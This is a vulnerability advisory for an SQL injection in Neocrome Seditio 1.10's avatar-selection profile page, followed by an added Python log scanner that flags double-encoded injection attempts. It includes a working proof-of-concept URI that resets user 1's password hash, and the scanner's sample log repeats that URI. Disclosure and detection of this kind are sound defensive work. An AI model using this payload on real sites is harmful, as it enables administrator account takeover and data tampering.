Seditio Users.Profile.Inc.PHP SQL Injection Vulnerability
BID:21232
Info
| Bugtraq ID: | 21232 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 21 2006 12:00AM |
| Updated: | Nov 28 2006 07:15PM |
| Credit: | Mustafa Can Bjorn is credited with the discovery of this vulnerability. |
| Vulnerable: | Neocrome Seditio 1.10 |
| Not Vulnerable: | |
Discussion
Seditio is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Seditio 1.10 is vulnerable to this issue.
Exploit / POC
An attacker can exploit this issue via a web client.
The following proof-of-concept URI demonstrates this vulnerability:
http://www.example.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/*
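As an added illustration that is not part of the original advisory, the Python routine below scans constructed web-server access-log lines (the log format and sample entries are assumed) and flags requests to users.php whose parameters, once the double URL encoding used in the proof of concept above is undone, carry a NUL byte, a quote, or SQL comment sequences.

```python
"""Flag (double-)URL-encoded SQL injection attempts against users.php in access logs."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Indicators present in the BID 21232 proof of concept once decoded: a NUL byte,
# a single quote, inline comment sequences and a spliced-in column assignment.
SQLI_PATTERNS = [
    ("nul-byte", re.compile(r"\x00")),
    ("quote", re.compile(r"'")),
    ("comment", re.compile(r"/\*")),
    ("assignment", re.compile(r",\s*\w+\s*=")),
]
MAX_DECODE_ROUNDS = 3  # bound repeated decoding so crafted input cannot loop forever

def fully_decode(value: str) -> tuple[str, int]:
    """Percent-decode until the value stops changing; return (decoded, rounds used)."""
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds

def inspect_request(uri: str) -> dict:
    """Report which query parameters of one request URI look like SQL injection."""
    parts = urlsplit(uri)
    findings = []
    # parse_qsl strips one encoding layer; fully_decode removes any layers beneath it,
    # so %2500 becomes %00 and then a real NUL byte.
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        decoded, extra_rounds = fully_decode(raw)
        hits = [label for label, pat in SQLI_PATTERNS if pat.search(decoded)]
        if hits:
            findings.append({"param": name, "indicators": hits,
                             "double_encoded": extra_rounds > 0})
    return {"path": parts.path, "suspicious": bool(findings), "findings": findings}

LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_log(lines):
    """Return [(line_number, report)] for log lines whose request URI is suspicious."""
    alerts = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m:
            report = inspect_request(m.group(1))
            if report["suspicious"]:
                alerts.append((n, report))
    return alerts

# Constructed sample log lines (assumed combined-log format); the second carries
# the advisory's proof-of-concept URI, the third a single-encoded quote only.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Nov/2006:10:00:01 +0000] "GET /users.php?m=profile&a=avatarselect&x=011A99&id=default.gif HTTP/1.1" 200 512',
    '203.0.113.9 - - [21/Nov/2006:10:00:07 +0000] "GET /users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* HTTP/1.1" 200 512',
    '203.0.113.7 - - [21/Nov/2006:10:00:09 +0000] "GET /users.php?m=profile&id=O%27Brien.gif HTTP/1.1" 200 512',
]
```

The `double_encoded` flag separates requests that needed a second decoding pass (as the proof of concept does to slip past a filter that decodes only once) from ordinary single-encoded input such as an apostrophe in a filename.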
Solution / Fix
Solution:
The vendor has released a patch to address this issue.
References
References: